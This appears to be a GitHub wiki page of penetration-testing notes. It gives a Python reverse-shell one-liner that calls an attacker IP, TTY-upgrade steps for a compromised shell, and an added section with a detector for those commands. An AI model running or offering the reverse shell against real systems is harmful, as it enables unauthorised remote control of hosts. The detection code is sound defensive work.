Python
Alvin Smith edited this page Apr 9, 2024 · 18 revisions
This automatically creates a virtual environment, installs the package, and adds the package's associated applications (entry points) to a location on your PATH. For example, pipx install pycowsay makes the pycowsay command available globally, but sandboxes the pycowsay package in its own virtual environment. pipx never needs to run as sudo to do this.
https://github.com/A1vinSmith/arbitrary-python
python -m SimpleHTTPServer 80
python3 -m http.server
The default port is 8000
If it is not working, use: script /dev/null -c bash
- Start another netcat listener for the command below:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- However this shell still won’t do what we want it to, so we need to get full tty for an interactive shell.
python -c 'import pty; pty.spawn("/bin/bash")'
or
python3 -c 'import pty; pty.spawn("/bin/bash")'
- If phase 2 does not get the job done (Python spawns a better-featured bash shell, but you still won’t be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell):
export TERM=xterm # gives us access to term commands such as clear.
- Press CTRL+Z to put the shell in the background. Next, type this command in the same window:
stty raw -echo;fg
This will bring your shell back to the foreground with a fully interactive experience. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
PS: Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.
- OPTIONAL: adjust the tty size
❯ tput cols
124
❯ tput lines
56
stty rows 56 columns 124
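Seen from the defender's side, the socket one-liner, pty.spawn and script /dev/null steps above leave distinctive process command lines. The following is an added example, not part of the original wiki page: it flags those command lines in process-execution records. The record format ("<user> <command line>"), the rule names and the sample records are assumptions made for this example.

```python
import re
import shlex

PY_RE = re.compile(r"^python[\d.]*$")   # python, python2, python3.11, ...

def inline_python(argv):
    """Return the text after `python -c` (code plus its args), or None."""
    if argv and PY_RE.match(argv[0].rsplit("/", 1)[-1]) and "-c" in argv:
        return " ".join(argv[argv.index("-c") + 1:])
    return None

def classify(cmdline):
    """Return the set of rule names (hypothetical labels) one command line matches."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                  # unbalanced quotes in a truncated record
        argv = cmdline.split()
    hits = set()
    code = inline_python(argv)
    if code is not None:
        # A socket duplicated onto fds 0/1/2 and a shell started in the same one-liner.
        if "socket" in code and "dup2" in code and re.search(r"/bin/(ba|da|z)?sh", code):
            hits.add("py_socket_dup2_shell")
        # pty.spawn() of a shell: a PTY being allocated for a session that had none.
        if re.search(r"pty\.spawn\(\s*['\"][^'\"]*sh['\"]", code):
            hits.add("py_pty_spawn_shell")
    # `script /dev/null -c <shell>`: PTY allocation with the typescript discarded.
    if argv and argv[0].rsplit("/", 1)[-1] == "script" and "/dev/null" in argv and "-c" in argv:
        hits.add("script_devnull_pty")
    return hits

def scan(log_text):
    """Return (user, sorted rule names) for each '<user> <cmdline>' record that matches."""
    out = []
    for line in log_text.strip().splitlines():
        user, cmdline = line.split(None, 1)
        hits = classify(cmdline)
        if hits:
            out.append((user, sorted(hits)))
    return out

# Constructed sample records ("<user> <command line>"); 192.0.2.10 is a documentation address.
SAMPLE = r'''
www-data python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.0.2.10",7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
www-data python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data script /dev/null -c bash
alice python3 -m http.server
alice python3 -c 'import json,sys; print(json.load(sys.stdin)["name"])'
'''
```

Calling scan(SAMPLE) returns the three www-data records and skips the two ordinary alice commands; in practice the user running the process (a web-server account here) is what turns a match into an alert worth triaging.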
0x2f6574632f686f73746e616d65
print(bytes.fromhex('2f6574632f686f73746e616d65'))
0x20
print(bytes.fromhex('20'))